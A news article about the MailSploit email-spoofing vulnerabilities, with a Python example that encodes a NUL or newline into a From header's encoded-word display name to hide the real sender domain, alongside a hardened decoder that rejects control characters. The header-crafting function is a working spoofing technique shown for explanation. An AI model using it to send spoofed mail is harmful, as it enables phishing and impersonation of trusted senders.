Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, called 'MailSploit', affects Apple Mail, Mozilla Thunderbird and several official Microsoft email clients, as well as Yahoo Mail, ProtonMail and others, and has now been publicly disclosed. A list that tells you whether your client is affected by this hole is available to everyone here.
How does the attack work?
Haddouche built a payload by encoding control characters inside email headers (abusing the encoded-word mechanism that is meant for non-ASCII text) and used it to send a spoofed email that appeared to come from an official address belonging to the President of the United States.
“Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email.”
– Haddouche says in his blog post.
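To make the mechanism concrete, here is a small added example (not code from the original post or from Haddouche) that builds a From header whose encoded-word display name ends in a control character, shows what a client that decodes first and then truncates at a NUL or newline would display, and contrasts it with the check a hardened client should make. The addresses ceo@victim.example and attacker@evil.example are constructed placeholders.

```python
"""Added example for the MailSploit header trick; not the researcher's code.

The header values below are constructed placeholders, not real payloads."""
import base64
import re
from email.header import decode_header
from email.utils import parseaddr

# Any ASCII control character (C0 range or DEL) has no business in a decoded
# display name; the attack relies on a client passing one to its UI code.
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def encoded_word(text: str, charset: str = "utf-8") -> str:
    """Wrap text as a base64 encoded-word (the =?charset?B?...?= form)."""
    data = base64.b64encode(text.encode(charset)).decode("ascii")
    return f"=?{charset}?B?{data}?="


def craft_spoofed_from(visible: str, real: str, control: str = "\x00") -> str:
    """Build a From header whose decoded display name is the address the
    victim should see, followed by a control character, while the sender's
    real address sits in the angle-bracketed part. The control character is
    hidden inside the base64 so the raw header looks like ordinary ASCII."""
    return f"{encoded_word(visible + control)} <{real}>"


def decode_words(raw: str) -> str:
    """Decode every encoded-word in a header and join the pieces."""
    out = []
    for chunk, charset in decode_header(raw):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", errors="replace")
        out.append(chunk)
    return "".join(out)


def render_from_naive(raw: str) -> str:
    """Emulate a vulnerable client: decode the header, then hand the text to
    display code that treats it like a C string (stops at the first NUL) and
    shows only the first line. The real domain silently disappears."""
    text = decode_words(raw)
    text = text.split("\x00", 1)[0]
    lines = text.splitlines()
    return lines[0].strip() if lines else ""


def render_from_hardened(raw: str) -> tuple[str, str]:
    """Decode, refuse any control character in the decoded text, and return
    the display name together with the address so both are always shown."""
    display = decode_words(raw)
    if CONTROL.search(display):
        raise ValueError("control character in decoded From header")
    name, addr = parseaddr(display)
    return name, addr


if __name__ == "__main__":
    for ctrl in ("\x00", "\r\n"):
        hdr = craft_spoofed_from("ceo@victim.example", "attacker@evil.example", ctrl)
        print("raw header:  ", hdr)
        print("naive shows: ", render_from_naive(hdr))
        try:
            print("hardened:    ", render_from_hardened(hdr))
        except ValueError as exc:
            print("hardened:     rejected,", exc)
```

The naive path shows ceo@victim.example and nothing else for both the NUL and the CRLF variant, which is exactly the "hiding or removing the domain part" behaviour in the quote above. The hardened path does not try to be clever about which control character is in play; it rejects all of them after decoding, because the spoofing only works if something downstream interprets them.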
Mozilla and Opera consider this bug to be a server-side problem and will not be releasing a patch. Mailbird closed the ticket without responding to the issue, while the remaining 14 vendors have not yet commented on the researcher's report, but I guess they will also not respond to it.
Source: MailSploit